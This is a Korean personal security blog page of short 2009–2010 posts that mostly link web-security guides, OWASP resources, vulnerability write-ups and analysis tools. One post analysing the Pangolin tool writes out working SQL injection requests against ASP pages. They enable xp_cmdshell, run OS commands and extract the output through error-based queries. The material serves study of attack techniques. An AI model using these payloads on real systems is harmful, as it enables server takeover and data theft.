어플리케이션/웹보안2010. 3. 11. 10:27

웹 어플리케이션 개발보안 가이드 2010

웹응용프로그램 개발보안 가이드 2010.pdf


출 처 : http://www.mest.go.kr/me_kor/inform/info_data/security/1261666_10853.html

저작자표시
Posted by 김주일
어플리케이션/웹보안2010. 2. 3. 13:15

OWASP Broken Web Applications Project

Purpose: a collection of vulnerable web applications that is distributed on a Virtual Machine.

링크 : http://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project#tab=Project_Details

관련 이미지 다운로드 : http://code.google.com/p/owaspbwa/wiki/Downloads

id : root
pw : owaspbwa

Installation

The VM requires no installation. Simply extract the files from the archive and then start the VM in a VMware product. Once the machine is booted, you can access it via the console, SSH, or Samba using username=root and password=owaspbwa.

Note - The VM is entirely command line driven. X-Windows or other GUI systems have not been installed.

If you would like to access your VM from links off this site, the one configuration change you may need to make is to add an entry to your hosts file pointing to the name owaspbwa to the IP address of your VM.


저작자표시
Posted by 김주일
어플리케이션/웹보안2010. 1. 6. 12:26

2007 전자정부 웹취약점 대응지침

46 2007 전자정부 웹 서비스 취약점 대응지침 .hwp

51p. 참조

저작자표시
Posted by 김주일
어플리케이션/웹보안2010. 1. 6. 10:31

Google Chrome MetaCharacter URI Obfuscation Vulnerability

링크
- http://ww.milw0rm.com/exploits/7226
- http://zeroknock.blogspot.com/2010/01/link-injection-redirection-attacks.html

동영상
- http://www.secniche.org/videos/google_chrome_link_inj.html

동영상 배경음악이 인상적이였음

저작자표시
Posted by 김주일
어플리케이션/웹보안2009. 12. 23. 09:38

웹 보안 툴박스(http://toolbox.krcert.or.kr/)


KISA에서 제공하는 웹보안을 위한 서비스들이 모여 있네.

링크 : http://toolbox.krcert.or.kr/
저작자표시
Posted by 김주일
어플리케이션/웹보안2009. 12. 20. 12:35

웹사이트 개발운영을 위한 개인정보보호가이드

웹사이트개발운영을위한개인정보보호가이.pdf

괜히 했어. 삽질 괜히 했어.

저작자표시
Posted by 김주일
어플리케이션/웹보안2009. 11. 17. 09:22

OWASP TOP 10(2010)


언제 나온거지..
owasp_t10_-_2010_rc1.pdf

출 처 : http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
저작자표시
Posted by 김주일
어플리케이션/웹보안2009. 11. 4. 00:28

mod_security 우회 기법

언제 테스트 해보지..


출 처 : http://ptresearch.blogspot.com/2009/11/another-fine-method-to-exploit-sql.htm
저작자표시
Posted by 김주일
어플리케이션/웹보안2009. 9. 20. 17:43

Malzilla

링크 : http://malzilla.sourceforge.net/index.html

malzilla_1.2.0.zip

- 간단한 악성코드(출 처 : http://www.securityplus.or.kr/xe/?document_srl=13201#comment_13480)

저작자표시
Posted by 김주일
어플리케이션/웹보안2009. 7. 23. 18:24

Pangolin - XP(확장 프로시져) 활성화 명령어 분석

/board_view.asp?num=50%20;exec%20sp_configure%200x41006400200048006f00630020004400690073007400720069006200750074006500640020005100750065007200690065007300,1;
reconfigure;
exec%20sp_configure%200x730068006f007700200061006400760061006e0063006500640020006f007000740069006f006e007300,1;
reconfigure;
exec%20sp_configure%200x780070005f0063006d0064007300680065006c006c00,1;
reconfigure;--

exec sp_configure 'Ad Hoc Distributed Queries',1;
reconfigure;
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure xp_cmdshell,1;
reconfigure;--

/bbs_view.asp?num=39%20;exec%20master.dbo.sp_addextendedproc%200x780070005f006400690072007400720065006500,%200x7800700073007400610072002e0064006c006c00--

 

/board_view.asp?num=50 ;create table [pangolin_test_table]([resulttxt] nvarchar(4000) null);--

/board_view.asp?num=50 ;declare @z nvarchar(4000) set @z=0xdir c:\ insert into [pangolin_test_table](resulttxt) exec master.dbo.xp_cmdshell @z;alter table

[pangolin_test_table] add id int not null identity (1,1)--

/board_view.asp?num=50 and (select cast(count(1) as varchar(8000))+char(94) from [web]..[pangolin_test_table])>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] order by [id])

>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 2 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 3 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 4 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 5 id from [pangolin_test_table] order by [id]) )>0--

저작자표시
Posted by 김주일

티스토리툴바